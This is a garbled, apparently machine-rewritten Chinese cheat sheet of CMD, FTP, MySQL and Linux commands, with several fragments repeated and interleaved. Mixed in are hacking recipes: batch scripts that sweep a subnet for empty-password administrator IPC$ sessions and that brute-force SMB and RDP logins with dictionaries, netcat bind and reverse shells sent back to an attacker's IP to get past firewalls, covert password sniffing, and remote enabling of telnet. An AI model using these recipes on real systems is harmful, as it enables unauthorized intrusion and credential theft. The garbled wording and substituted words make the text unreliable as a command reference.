:指施行command   参数:/L 指用增量方式{ (set)为增量形式时 };/F 指从文件中穿梭取值,直到取完甘休{ (set)为文件时,如(d:pass.txt)时 }。   用法比如:   @echo off   echo 用法格式:test.bat *.*.* > test.txt   for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%G /user:administrator | find "命令成功实现" >>test.txt   存为test.bat 表达:对点名的一个C类网段的2伍十三个IP依次试创立administrator密码为空的IPC$连接,假若成功就把该IP存在test.txt中。   /L指用增量格局(即从1-254或254-1);输入的IP后面三个人:*.*.*为批管理暗许的 %1;%%G 为变量(ip的最终一个人);& 用来隔断echo 和net use 那叁个指令;| 指建构了ipc$后,在结果中用find查看是还是不是有"命令成功做到"消息;%1.%%G 为完整的IP地址;(1 1 254) 指开头值,拉长量,结止值。   @echo off   echo 用法格式:ok.bat ip   FO宝马X3 /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200   存为:ok.exe 表明:输入三个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完截止。%%i为用户名;%1为输入的IP地址(默许)。   七:   2:if命令及变量 基本格式   IF [not] errorlevel 数字 命令语句 要是程序运维最后回到四个也等于或凌驾钦赐数字的退出编码,内定条件为“真”。   例:IF errorlevel 0 命令 指程序施行后重回的值为0时,就值行前边的一声令下;IF not errorlevel 1 命令指程序实施最终回到的值不等于1,就进行后边的命令。   0 指开采并打响实践(真);1 指没有开掘、没推行(假)。   IF [not] 字符串1==字符串2 限令语句 假若钦命的文本字符串匹配(即:字符串1 对等 字符串2),就实施后边的授命。   例:“if "%2%"=="4" goto start”指:假若输入的第二个变量为4时,施行前边的一声令下(注意:调用变量时就%变量名%并加" ")   IF [not] exist 文件名 命令语句 假如钦点的文本名存在,就实施前面包车型客车一声令下。   例:“if not nc.exe goto end”指:若无察觉nc.exe文件就跳到":end"标签处。   IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 指令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当后面包车型大巴尺度不树立即,就指行else后边的指令。注意:else 必须与 if 在同等行才有效。 当有del命令时需把del命令全体内容用< >括起来,因为del命令要独立一行时才干实行,用上< >后就卓绝是独自一行了;举个例子:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”   系统外界命令   注:系统外界命令(均需下载相关工具)   瑞士联邦军刀:nc.exe   参数表明:   -h 查看协理音信   -d 后台方式  -e prog程序重定向,一但连接就推行[危险]   -i secs延时的间距   -l 监听形式,用于入站连接   -L 监听格局,连接天闭后如故雄起雌伏监听,直到CTPRADO C   -n IP地址,不能够用域名   -o film记录16进制的传输   -p[空格]端口 本地端口号   -r 随机本地及远程端口   -t 使用Telnet交互格局   -u UDP情势   -v 详细输出,用-vv将更详实   -w数字 timeout延时间隔   -z 将输入,输出关掉(用于扫锚时)   基本用法:   nc -nvv 192.168.0.1 80 连接受192.168.0.1主机的80端口   nc -l -p 80 开启本机的TCP 80端口并监听   nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口   nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口   nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口   高端用法:   nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CT索罗德 C截止  nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTEnclave C,同不寻常间把结果输出到c:log.txt   nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CT福睿斯 C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件成效  type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTTiggo C,并把c:honeyport.txt中剧情送入管道中,亦可起到传送文件作用  本机上用:nc -l -p 本机端口   在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K   nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙   本机上用:nc -d -l -p 本机端口 < 要传递的文书路线及称谓   在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的门径及称号 传送文件到对方主机   备 注:   | 管道命令   < 或 > 重定向命令。“<”,举例:tlntadmn < test.txt 指把test.txt的剧情赋值给tlntadmn命令   @ 表示奉行@前边的通令,但不会议及展览示出来(后台实行);例:@dir c:winnt >> d:log.txt 意思是:后台施行dir,并把结果存在d:log.txt中   >与>>的分别 ">"指:覆盖;">>"指:保存到(增添到)。   如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt三个指令分别实施三回相比看:用>>的则是把二回的结果都保留了,而用:>则只有三次的结果,是因为第二遍的结果把第1回的掩盖了。   八:   扫描工具:xscan.exe   基本格式   xscan -host <发轫IP>[-<终止IP>] <检验项目> [任何选项] 扫锚"开首IP到终止IP"段的拥有主机音讯   xscan -file <主机列表文件名> <检查评定项目> [别的选项] 扫锚"主机IP列表文件名"中的全体主机新闻   检验系列   -active 检验主机是不是存活   -os 检查实验远程操作系统类型(通过NETBIOS和SNMP协议)   -port 检查评定常用服务的端口状态   -ftp 检查实验FTP弱口令   -pub 检验FTP服务佚名用户写权限   -pop3 检查实验POP3-Server弱口令   -smtp 检验SMTP-Server漏洞   -sql 检查实验SQL-Server弱口令   -smb 检查测量检验NT-Server弱口令   -iis 检查评定IIS编码/解码漏洞   -cgi 检查评定CGI漏洞   -nasl 加载Nessus攻击脚本   -all 检查评定以上全体类型   其余选项   -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取   -l 展现全数网络适配器   -v 展现详细扫描进程   -p 跳过未有响应的主机   -o 跳过并没有检查测验到开放端口的主机   -t 并发线程数量,并发主机数量 钦定最大并发线程数量和产出主机数量, 私下认可数量为100,10   -log 文件名 钦点扫描报告文本名 (后缀为:TXT或HTML格式的公文)   用法示例   xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检查实验192.168.1.1-192.168.255.255网段内主机的享有漏洞,跳过无响应的主机   xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检验192.168.1.1-192.168.255.255网段内主机的正儿八经端口状态,NT弱口令用户,最大并发线程数量为150,跳过并未检验到开放端口的主机   xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检验“hostlist.txt”文件中列出的有着主机的正规端口状态,CGI漏洞,最大并发线程数量为200,同不平日刻最多检查实验5台主机,显示详细检查评定进程,跳过未有检查测量检验到开放端口的主机   九:   命令行形式嗅探器: xsniff.exe   可捕获局域网内FTP/SMTP/POP3/HTTP协议密码   参数表达   -tcp 输出TCP数据报   -udp 输出UDP数据报   -icmp 输出ICMP数据报   -pass 过滤密码音信   -hide 后台运营   -host 深入分析主机名   -addr IP地址 过滤IP地址   -port 端口 过滤端口   -log 文件名 将出口保存到文件   -asc 以ASCII方式出口   -hex 以16进制方式出口   用法示例   xsniff.exe -pass -hide -log pass.log 后台运营嗅探密码并将密码新闻保存在pass.log文件中   xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp音信并以ASCII格式输出   终端服务密码破解: tscrack.exe   参数表明   -h 展现应用帮忙   -v 展现版本消息   -s 在显示器上打出解密工夫   -b 密码错误时发生的声音   -t 同是发出几个三翻五次(三四线程)   -N Prevent System Log entries on targeted server   -U 卸载移除tscrack组件   -f 使用-f后边的密码   -F 间隔时间(频率)   -l 使用-l前边的用户名   -w 使用-w前边的密码字典   -p 使用-p前面包车型客车密码   -D 登陆主页面   用法示例   tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登入密码   tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登入192.168.0.1的administrator用户   @if not exist ipcscan.txt goto noscan   @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i   nscan   @echo 3389.txt no find or scan faild   (①存为3389.bat) (若是现成用SuperScan或别的扫锚器扫到一堆开有3389的主机IP列表文件3389.txt)   3389.bat意思是:从3389.txt文本中取八个IP,接着运维hack.bat   @if not exist tscrack.exe goto noscan   @tscrack %1 -l administrator -w pass.dic >>rouji.txt   :noscan   @echo tscrack.exe no find or scan faild   (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就能够等待结果了)   hack.bat意思是:运维tscrack.exe用字典暴破3389.txt中具有主机的administrator密码,并将破解结果保存在rouji.txt文件中。   其余   Shutdown.exe   Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2004连串自带工具,在Windows3000下用进就得下载此工具本领用。在前方Windows 二〇〇〇 DOS命令中有详实介绍。)   fpipe.exe (TCP端口重定向工具) 在第二篇中有详尽表明(端口重定向绕过防火墙)   fpipe -l 80 -s 1029 -r 80 当有人扫锚你的80端口时,他扫到的结果会全盘是的主机消息   Fpipe -l 23 -s 88 -r 23 指标IP 把本机向目的IP发送的23端口Telnet恳求经端口重定向后,就因而88端口发送到目的IP的23端口。(与对象IP建设构造Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接受目的IP的23端口了。   OpenTelnet.exe (远程开启telnet工具)   opentelnet.exe IP 帐号 密码 ntlm认证方法 Telnet端口 (无需上传ntlm.exe破坏微软的身份验证格局)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。   NTLM认证格局:0:不选取NTLM身份验证;1:先品尝NTLM身份验证,假若失利,再使用用户名和密码;2:只利用NTLM身份验证。   ResumeTelnet.exe (OpenTelnet附带的另八个工具)   resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用那个命令将对方的Telnet设置还原,并同不经常间关闭Telnet服务。   FTP命令详解   FTP命令是Internet用户使用最频仍的授命之一,纯熟并灵活运用FTP的内部命令,可以大大有利于使用者,并选取一石两鸟之效。假诺你想上学使用进行后台FTP下载,那么就非得学习FTP指令。   FTP的命令行格式为:   ftp -v -d -i -n -g [主机名] ,个中   -v 突显远程服务器的兼具响应消息   -n 限制ftp的自动登陆,即不使用;.n etrc文件;   -d 使用调节和测量试验方式;   -g 撤除全局文件名。   FTP使用的里边命令如下(中括号表示可选拔):   1.![cmd[args]]:在地面机中施行交互shell,exit回到ftp处境,如:!ls*.zip   2.$ macro-ame[args]: 实施宏定义macro-name。   3.account[password]: 提供登入远程系统成功后走访系统财富所需的填补口令。   4.append local-file[remote-file]:将当和姑件扩张到长途系统主机,若未内定远程系统文件名,则应用当半夏件名。   5.ascii:使用ascii类型传输情势。   6.bell:每一个命令实施落成后Computer响铃贰次。   7.bin:使用二进制文件传输格局。   8.bye:退出ftp会话进度。   9.case:在利用mget时,将长途主机文件名中的大写转为小写字母。   10. cd remote-dir:进入远程主机目录。   11.cdup:进入远程主机目录的父目录。   12.chmod mode file-name:将长途主机文件file-name的存取情势设置为mode,如:chmod 777 a.out。   13.close:中断与长途服务器的ftp会话(与open对应)。   14 .cr:使用asscii格局传输文件时,将回车换行调换为回行。   15.delete remote-file:删除远程主机文件。   16.debug[debug-value]:设置调节和测量试验格局, 展现发送至远程主机的每条命令,如:deb up 3,若设为0,表示撤除debug。   17.dir[remote-dir][local-file]:突显远程主机目录,并将结果存入本三步跳件。   18.disconnection:同close。   19.form format:将文件传输情势设置为format,缺省为file格局。   20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。   21.glob:设置mdelete,mget,mput的文件名扩充,缺省时不扩张文件名,同命令行的-g参数。   22.hash:每传输1024字节,展现叁个hash符号(#)。   23.help[cmd]:显示ftp内部命令cmd的扶助音信,如:help get。   24.idle[seconds]:将长途服务器的蛰伏机械漏刻设为[seconds]秒。   25.image:设置二进制传输格局(同binary)。   26.lcd[dir]:将地方职业目录切换至dir。   27. ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入当地文件local-file。   28.macdef macro-name:定义贰个宏,蒙受macdef下的空行时,宏定义甘休。   29.mdelete[remote-file]:删除远程主机文件。   30.mdir remote-files local-file:与dir类似,但可钦赐多个长途文件,如 :mdir *.o.*.zipoutfile 。   31.mget remote-files:传输七个长途文件。   32.mkdir dir-name:在长距离主机中国建工业总会公司一索引。   33.mls remote-file local-file:同nlist,但可内定五个文本名。   34.mode[modename]:将文件传输方式设置为modename, 缺省为stream格局。   35.modtime file-name:突显远程主机文件的末尾修改时间。   36.mput local-file:将多个文件传输至远程主机。   37.newer file-name: 假设远程机中file-name的修改时间比本地硬盘同名文件的时日更近,则重传该文件。   38.nlist[remote-dir][local-file]:展现远程主机目录的文件清单,并存入本地硬盘的local-file。   39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某个字符相互转变, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名改成a1,a2。 该命令特别适用于远程主机为非UNIX机的情状。   40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1福特Explorer,则文件名LLL将改成RAV4瑞鹰冠道。   41.open host[port]:塑造钦定ftp服务器连接,可钦定连接端口。   42.passive:进入被动传输情势。   43.prompt:设置七个文件传输时的竞相提醒。   44.proxy ftp-cmd:在次要调节连接中,实行一条ftp命令, 该命令允许连接八个ftp服务器,以在三个服务器间传输文件。第一条ftp命令必须为open,以第第一建工公司立四个服务器间的三回九转。   45.put local-file[remote-file]:将地面文件local-file传送至远程主机。   46.pwd:展现远程主机的当前职业目录。   47.quit:同bye,退出ftp会话。   48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.   49.recv remote-file[local-file]:同get。   50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。   51.rhelp[cmd-name]:哀告得到远程主机的佑助。   52.rstatus[file-name]:若未内定文件名,则彰显远程主机的状态, 不然呈现文件状态。   53.rename[from][to]:改动远程主机文件名。   54.reset:清除回答队列。   55.restart marker:从钦定的申明marker处,重新开首get或put,如:restart 130。   56.rmdir dir-name:删除远程主机目录。   57.runique:设置文件名只一性存款和储蓄,若文件存在,则在原来的作品件后加后缀.1, .2等。   58.send local-file[remote-file]:同put。   59.sendport:设置PORT命令的采取。   60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。   61.size file-name:展现远程主机文件大小,如:site idle 7200。   62.status:展现当前ftp状态。   63.struct[struct-name]:将文件传输结构安装为struct-name, 缺省时接纳stream结构。   64.sunique:将远程主机文件名存款和储蓄装置为只一(与runique对应)。   65.system:呈现远程主机的操作系统类型。   66.tenex:将文件传输类型设置为TENEX机的所需的项目。   67.tick:设置传输时的字节计数器。   68.trace:设置包追踪。   69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输情势。   70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3   71.user user-name[password][account]:向远程主机注明本身的地位,供给口令时,必须输入口令,如:user anonymous [email protected]。   72.verbose:同命令行的-v参数,即设置详细报告办法,ftp 服务器的富有响 应都将显示给用户,缺省为on.   73.?[cmd]:同help.

    CMD命令锦集

    route print 突显出IP路由,将主要浮现网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface 

    route print 展现出IP路由,将根本显示互联网地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface 

    #4 四:

    命令简单介绍 cmd是command的缩写.即命令行 。 就算随着计算机行业的迈入,Windows 操作系统的应...

          1. gpedit.msc-----组策略

    arp 查看和拍卖ARP缓存,ARP是名字分析的情趣,担负把贰个IP剖析成八个物理性的MAC地址。arp -a将体现出任何音讯 

    arp 查看和拍卖ARP缓存,ARP是名字解析的情致,肩负把二个IP解析成八个物理性的MAC地址。arp -a将显得出成套音讯 

    IIS服务命令:
    iisreset /reboot 重启win2kComputer(但有提醒系统将重启新闻现身)
    iisreset /start或stop 启动(停止)所有Internet服务
    iisreset /restart 截止然后再次开动全数Internet服务
    iisreset /status 展现全体Internet服务情状
    iisreset /enable或disable 在地头系统上启用(禁止使用)Internet服务的重复开动
    iisreset /rebootonerror 当运营、甘休或再度开动Internet服务时,若产生错误将重新开机
    iisreset /noforce 若无法甘休Internet服务,将不会强制结束Internet服务
    iisreset /timeout Val在达到逾时间(秒)时,仍未截至Internet服务,若钦定/rebootonerror参数,则Computer将会再也开机。预设值为重新起动20秒,停止60秒,重新开机0秒。
    FTP 命令: (后边有详实表达内容)
    ftp的吩咐行格式为:
    ftp -v -d -i -n -g[主机名] -v 呈现远程服务器的具有响应新闻。
    -d 使用调节和测量试验格局。
    -n 限制ftp的机关登录,即不使用.netrc文件。
    -g 撤销全局文件名。
    help [命令] 或 ?[命令] 查看命令表明
    bye 或 quit 终止主机FTP进度,并脱离FTP管理格局.
    pwd 列出脚下远端主机目录
    put 或 send 当和姑件名 [上传到主机上的文件名] 将地方一个文本传送至远端主机中
    get 或 recv [长途主机文件名] [下载到地面后的文本名] 从远端主机中传递至本土主机中
    mget [remote-files] 从远端主机接收一堆文件至地面主机
    mput local-files 将本地主机中一群众文化艺术件传送至远端主机
    dir 或 ls [remote-directory] [local-file] 列出脚下远端主机目录中的文件.假设有当三步跳件,就将结果写至地点文件
    ascii 设定以ASCII格局传送文件(缺省值)
    bin 或 image 设定以二进制形式传递文件
    bell 每落成三遍文件传送,报告警察方提醒
    cdup 再次回到上一流目录
    close 中断与长途服务器的ftp会话(与open对应)
    open host[port] 建构钦赐ftp服务器连接,可内定连接端口
    delete 删除远端主机中的文件
    mdelete [remote-files] 删除一堆文件
    mkdir directory-name 在远端主机中国建工业总会公司立目录
    rename [from] [to] 改造远端主机中的文件名
    rmdir directory-name 删除远端主机中的目录
    status 突显当前FTP的场合
    system 展现远端主机系统项目
    user user-name [password] [account] 重新以其他用户名登入远端主机
    open host [port] 重新创造一个新的连接
    prompt 交互提醒格局
    macdef 定义宏命令
    lcd 改换这两天本土主机的干活目录,如若缺省,就转到当前用户的HOME目录
    chmod 改造远端主机的公文权限
    case 当为ON时,用MGET命令拷贝的文本名到地面机械中,全体转移为小写字母
    cd remote-dir 进入远程主机目录
    cdup 进入远程主机目录的父目录
    ! 在本地机中实施交互shell,exit回到ftp景况,如!ls*.zip

      2. sndrec32-------录音机

    start 程序名或指令 /max 或/min 新开一个新窗口并最大化(最小化)运维某先后或命令 

    start 程序名或指令 /max 或/min 新开一个新窗口并最大化(最小化)运转某先后或命令 

    #5 五:

      3. Nslookup-------IP地址侦测器 ,是贰个 监测互连网中 DNS 服务器是或不是能正确贯彻域名深入分析的命令行工具。 它在 Windows NT/3000/XP 中均可利用 , 但在 Windows 98 中却不曾并轨那四个工具。

    mem 查看cpu使用境况 

    mem 查看cpu使用情形 

    MYSQL 命令:
    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;假使刚安装好MYSQL,一级用户root是从未密码的。
    (例:mysql -h110.110.110.110 -Uroot -P123456
    注:u与root可以不要加空格,别的也一律)
    exit 退出MYSQL
    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
    grant select on 数据库.* to 用户名@登陆主机 identified by "密码"; 扩展新用户。(注意:和方面不相同,下边包车型大巴因为是MYSQL遇到中的命令,所以前边都带一个子公司作为命令甘休符)
    show databases; 展现数据库列表。刚初始时才五个数据库:mysql和test。mysql库很首要它里面有MYSQL的类别信息,我们改密码和新增加用户,实际上就算用这些库开始展览操作。
    use mysql;
    show tables; 展现库中的数据表
    describe 表名; 展现数据表的组织
    create database 库名; 建库
    use 库名;
    create table 表名 (字段设定列表); 建表
    drop database 库名;
    drop table 表名; 删库和删表
    delete from 表名; 将表中记录清空
    select * from 表名; 显示表中的记录
    mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\mysql\bin目录下推行);注释:将数据库school备份到school.bbb文件,school.bbb是二个文件文件,文件名任取,打开看看你会有新意识。
    win二〇〇三种类下新添命令(实用部份):
    shutdown /参数 关闭或重启本地或远程主机。
    参数表明:/S 关闭主机,/奥德赛 重启主机, /T 数字 设定延时的年月,范围0~180秒之内, /A撤消开机,/M //IP 钦定的中距离主机。
    例:shutdown /r /t 0 立即重启本地主机(无延时)
    taskill /参数 进度名或进度的pid 终止一个或三个职务和经过。
    参数说明:/PID 要结束进度的pid,可用tasklist命令得到各进度的pid,/IM 要适可而止的历程的历程名,/F 强制甘休过程,/T 终止钦定的长河及她所运行的子进度。
    tasklist 突显当前运作在本土和长途主机上的长河、服务、服务各进度的进度标记符(PID)。
    参数表明:/M 列出当前进度加载的dll文件,/SVC 呈现出种种进程对应的服务,无参数时就只列出脚下的进程。

      4. explorer-------开荒财富管理器

    attrib 文件名(目录名) 查看某文件(目录)的属性 

    attrib 文件名(目录名) 查看某文件(目录)的属性 

    #6 六:

      5. logoff---------撤回命令

    attrib 文件名 -A -Evoque -S -H 或 A 奥德赛 S H 去掉(增加)某文件的 存档,只读,系统,隐藏 属性;用+则是加上为某属性 

    attrib 文件名 -A -PRADO -S -H 或 A LAND S H 去掉(增加)某文件的 存档,只读,系统,隐藏 属性;用+则是加多为某属性 

    Linux系统下大旨命令: 要分别轻重缓急写
    uname 彰显版本音讯(同win2K的 ver)
    dir 展现当前目录文件,ls -al 彰显包含隐形文件(同win2K的 dir)
    pwd 查询当前所在的目录地方
    cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /重返到根目录。
    cat 文件名 查看文件内容
    cat >abc.txt 往abc.txt文件中写上内容。
    more 文件名 以一页一页的方法体现一个文件文件。
    cp 复制文件
    mv 移动文件
    rm 文件名 删除文件,rm -a 目录名删除目录及子目录
    mkdir 目录名 建设构造目录
    rmdir 删除子目录,目录内尚未文书档案。
    chmod 设定档案或目录的存取权限
    grep 在档案中找找字符串
    diff 档案文件比较
    find 档案搜寻
    date 今后的日子、时间
    who 查询近日和您利用一样台机器的人以及Login时间地方
    w 查询近期上机者的详细资料
    whoami 查看本身的帐号名称
    groups 查看某一个人的Group
    passwd 改换密码
    history 查看自个儿下过的一声令下
    ps 显示进程景况
    kill 结束某进度
    gcc 黑客经常用它来编写翻译C语言写的文书
    su 权限调换为钦点使用者
    telnet IP telnet连接对方主机(同win2K),当出现bash$时就表达连接成功。
    ftp ftp连接上某服务器(同win2K)

      6. shutdown-------60秒倒计时关机命令

    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C展现文件创设时间,/T:A呈现文件上次被访问时间,/T:W上次被改换时间 

    dir 查看文件,参数:/Q展现文件及目录属系统哪个用户,/T:C展现文件创制时间,/T:A呈现文件上次被访问时间,/T:W上次被涂改时间 

    附:批处理命令与变量

      7. lusrmgr.msc----本机用户和组

    date /t 、 time /t 使用此参数即"DATE/T"、"TIME/T"将只呈现当前几天期和时间,而毋庸输入新日期和岁月 

    date /t 、 time /t 使用此参数即"DATE/T"、"TIME/T"将只体现当后天子和岁月,而毋庸输入新日期和时间 

    1:for命令及变量 基本格式:
    FOR /参数 %variable IN (set) DO command [command_parameters] %variable:内定贰个纯粹字母可替换的参数,如:%i ,而内定贰个变量则用:%%i ,而调用变量时用:%i% ,变量是分别轻重缓急写的(%i 不对等 %I)。
    批管理每回能管理的变量从%0—%9共十个,当中%0私下认可给批管理文件名使用,%1默以为利用此批管理时输入的的首先个值,同理:%2—%9指输入的第2-9个值;例:net use \ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

      8. services.msc---本地服务设置

    set 钦赐遇到变量名称=要指派给变量的字符 设置境况变量 

    set 钦命意况变量名称=要指派给变量的字符 设置条件变量 

    (set):钦命二个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ "(1 1 254)"第二个"1"指伊始值,第二个"1"指拉长量,第七个"254"指终结值,即:从1到254;"(1 -1 254)"表达:即从254到1 }

      9. oobe/msoobe /a----检查XP是或不是激活

    set 展现当前具有的条件变量 

    set 展现当前享有的条件变量 

    command:内定对第个文件举行的指令,如:net use命令;如要实施多少个指令时,命令那间加:& 来隔绝
    command_parameters:为特定命令钦命参数或命令行开关

      10. notepad--------展开记事本

    set p(或别的字符) 显示出方今以字符p(或别的字符)开首的装有条件变量 

    set p(或其余字符) 展现出脚下以字符p(或任何字符)初叶的全部条件变量 

    IN (set):指在(set)中取值;DO command :指执行command

      11. cleanmgr-------垃圾整理

    pause 暂停批管理程序,并呈现出:请按任性键继续.... 

    pause 暂停批管理程序,并显示出:请按任性键继续.... 

    参数:/L 指用增量格局{ (set)为增量方式时 };/F 指从文件中不停取值,直到取完结束{ (set)为文件时,如(d:pass.txt)时 }。
    用法譬如:
    @echo off
    echo 用法格式:test.bat *.*.* > test.txt

      12. net start messenger----起头信使服务

    if 在批处理程序中实践法则管理(越来越多表明见if命令及变量) 

    if 在批管理程序中实施尺度处理(越来越多表达见if命令及变量) 

    for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功做到" >>test.txt
    存为test.bat 表明:对点名的一个C类网段的253个IP依次试创立administrator密码为空的IPC$连接,假使成功就把该IP存在test.txt中。

      13. compmgmt.msc---计算机管理

    goto 标签 将cmd.exe导向到批管理程序中带标签的行(标签必须独立一行,且以冒号打头,举个例子:":start"标签) 

    goto 标签 将cmd.exe导向到批管理程序中带标签的行(标签必须独立一行,且以冒号打头,举个例子:":start"标签) 

    /L指用增量方式(即从1-254或254-1);输入的IP后边三个人:*.*.*为批管理暗许的 %1;%%G 为变量(ip的终极一个人);& 用来隔绝echo 和net use 那叁个指令;| 指建设构造了ipc$后,在结果中用find查看是不是有"命令成功做到"新闻;%1.%%G 为完全的IP地址;(1 1 254) 指开端值,拉长量,结止值。
    @echo off
    echo 用法格式:ok.bat ip
    FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200
    存为:ok.exe 表达:输入二个IP后,用字典文件d:pass.dic来暴解d:user.dic中的用户密码,直到文件中值取完截止。%%i为用户名;%1为输入的IP地址(暗中同意)。

      14. net stop messenger-----截止信使服务

    call 路径批处理文件名 从批管理程序中调用另一个批管理程序 (越来越多表达见call /?) 

    call 路径批管理文件名 从批管理程序中调用另四个批管理程序 (越多表明见call /?) 

    #7 七:

      15. conf-----------启动netmeeting

    for 对一组文件中的每二个文书推行某些特定命令(更加多表达见for命令及变量) 

    for 对一组文件中的每三个文件实行某些特定命令(越来越多表明见for命令及变量) 

    2:if命令及变量 基本格式:
    IF [not] errorlevel 数字 命令语句 假诺程序运转最后回到一个约等于或超越内定数字的退出编码,内定条件为"真"。
    例:IF errorlevel 0 命令 指程序实行后再次回到的值为0时,就值行前面包车型客车授命;IF not errorlevel 1 命令指程序施行最后回来的值不对等1,就实施前边的一声令下。
    0 指发掘并成功进行(真);1 指未有意识、没实践(假)。
    IF [not] 字符串1==字符串2 命令语句 如若钦定的文本字符串相称(即:字符串1 非常字符串2),就进行后边的指令。
    例:"if "%2%"=="4" goto start"指:借使输入的首个变量为4时,实施前面包车型客车下令(注意:调用变量时就%变量名%并加" ")
    IF [not] exist 文件名 命令语句 假使钦命的文本名存在,就实行前边的吩咐。
    例:"if not nc.exe goto end"指:如果没有发掘nc.exe文件就跳到":end"标签处。
    IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 指令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前边的尺码不成立刻,就指行else前边的命令。注意:else 必须与 if 在长久以来行才有效。 当有del命令时需把del命令全体内容用< >括起来,因为del命令要单独一行时技艺推行,用上< >后就也便是是独自一行了;举例:"if exist test.txt. else echo test.txt.missing ",注意命令中的"."

      16. dvdplay--------DVD播放器

    echo on或off 展开或关闭echo,仅用echo不加参数则展现当前echo设置 

    echo on或off 展开或关闭echo,仅用echo不加参数则展现当前echo设置 

    (二)系统外界命令(均需下载相关工具):

      17. charmap--------运维字符映射表

    echo 消息 在显示器上显得出音讯 

    echo 消息 在显示器上出示出新闻 

    1、瑞士联邦军刀:nc.exe

      18. diskmgmt.msc---磁盘管理实用程序

    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 

    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 

    参数表明:
    -h 查看援助音讯
    -d 后台情势
    -e prog程序重定向,一但老是就施行[危急]
    -i secs延时的间隔
    -l 监听格局,用于入站连接
    -L 监听形式,连接天闭后仍旧一连监听,直到CTCR-V C
    -n IP地址,无法用域名
    -o film记录16进制的传导
    -p[空格]端口 本地端口号
    -r 随机本地及远程端口
    -t 使用Telnet交互格局
    -u UDP模式
    -v 详细输出,用-vv将更详细
    -w数字 timeout延时间隔
    -z 将输入,输出关掉(用于扫锚时)
    骨干用法:
    nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口
    nc -l -p 80 开启本机的TCP 80端口并监听
    nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
    nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
    nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口
    高档用法:
    nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CT帕杰罗 C截止
    nc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTENCORE C,同不经常间把结果输出到c:log.txt
    nc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTPRADO C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件成效
    type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CT本田UR-V C,并把c:honeyport.txt中剧情送入管道中,亦可起到传送文件成效
    本机上用:nc -l -p 本机端口
    在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K
